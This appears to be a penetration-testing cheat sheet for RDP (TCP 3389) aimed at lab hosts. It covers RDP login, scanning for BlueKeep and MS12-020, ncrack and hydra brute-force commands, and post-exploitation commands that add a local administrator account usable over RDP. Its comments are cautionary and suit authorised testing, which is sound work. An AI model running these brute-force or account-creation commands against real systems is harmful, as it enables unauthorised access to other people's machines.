RDP (Microsoft Terminal Services / ms-wbt-server) - TCP 3389

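#login
# Interactive RDP clients. Both prompt for the password when none is supplied, so
# leave -p / "/p:" off the command line: a password in argv ends up in shell history
# and is visible to anyone running ps on the attack box.
rdesktop -u DISCO 10.11.1.13
# xfreerdp options are one token each: "+clipboard" (no space) turns on clipboard
# sharing; written as "+ clipboard" it is two arguments and is not a valid option.
xfreerdp /u:admin /v:10.10.10.10 +clipboard
# Lab hosts usually present a self-signed certificate. Accept it interactively; only
# add /cert:ignore (older builds: /cert-ignore) when the prompt blocks automation,
# since it disables the one check that would catch an RDP man-in-the-middle.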

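#Add a user
# Post-exploitation on the Windows target: create a local account that can log in
# over RDP. Requires an elevated (local administrator) shell.
# Loud by design: the first line writes Security event 4720 (user created) and each
# group change writes 4732 (member added to a local group); the account is also
# visible in "net user". Record it and remove it at the end of the engagement.
# The password must satisfy the host's length/complexity policy or the first line fails.
net user redcliff password123 /add
net localgroup Administrators redcliff /add
# Members of Administrators can already log on via RDP; this line is what matters when
# the account is deliberately kept out of Administrators.
net localgroup "Remote Desktop Users" redcliff /add
# If the host does not listen on 3389 at all, RDP is disabled: fDenyTSConnections under
# HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server must be 0 and the
# "Remote Desktop" firewall rule group enabled before any of this is reachable.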

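#RDPscan
# rdpscan (robertdavidgraham) is a standalone, unauthenticated BlueKeep
# (CVE-2019-0708) checker. No sudo on the clone: root is not needed and it
# leaves a root-owned tree in your working directory.
git clone https://github.com/robertdavidgraham/rdpscan.git
cd rdpscan && make   # produces ./rdpscan; needs the OpenSSL headers (see the repo README)
# One host, a range, or --file <list>; reports VULNERABLE / SAFE / UNKNOWN per target.
./rdpscan 10.10.10.10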

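#msfconsole | bluekeep
# 1) Build the target list from hosts that actually expose 3389. The original
#    filtered grepable output on "Status: Up", which keeps every live host whether
#    or not RDP is open; match the open-port record instead. -T4 instead of -T5:
#    T5 silently drops results on anything but a quiet LAN.
nmap -p3389 --open -T4 <subnet>/24 -oG - | awk '/3389\/open/{print $2}' > rdp.lst
# 2) Run the BlueKeep *check* module over that list (file: reads one host per line).
#    This module only detects. The RCE module is a separate step and can BSOD the
#    target, so stop at the check unless the rules of engagement allow a crash.
msfconsole -q -x "use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS file:rdp.lst; run; exit"
# A positive result looks like:
#  [+] 10.X.X.X:3389      - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.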

#Bruteforcing

ncrack -vv --user -P pwds.txt rdp:// 
hydra -V -f -L -P rdp://
ncrack -vv --user DISCO -P passwords.txt rdp://10.11.1.1 
sudo ncrack -vv --user peter -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.11:3389
hydra -V -f -L DISCO.txt -P passwords.txt rdp://10.11.1.13

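#nmap script
# Unauthenticated fingerprinting of one RDP listener:
#  rdp-enum-encryption  - which security layers the server accepts (legacy RDP
#                         encryption, TLS, CredSSP/NLA). A server that still allows
#                         non-NLA connections exposes the pre-auth login path that
#                         BlueKeep-class bugs need and that password guessing uses.
#  rdp-ntlm-info        - hostname, NetBIOS/DNS domain and OS build, taken from the
#                         NTLM challenge; needs the server to offer CredSSP/NLA.
#  rdp-vuln-ms12-020    - check for the 2012 Terminal Services DoS/RCE (only relevant
#                         to unpatched legacy hosts; the NSE doc says the check itself
#                         does not crash the target).
# -Pn: Windows hosts commonly drop ICMP, so do not let host discovery skip the target.
nmap -Pn -p 3389 -T4 --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" 10.11.1.1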

#ms-wbt-server Microsoft Terminal Services
# Single-host probe: skip ping (-Pn), grab the service banner (-sV) and run the
# MS12-020 check against 3389.
nmap -Pn -sV -p 3389 --script rdp-vuln-ms12-020 10.11.1.11
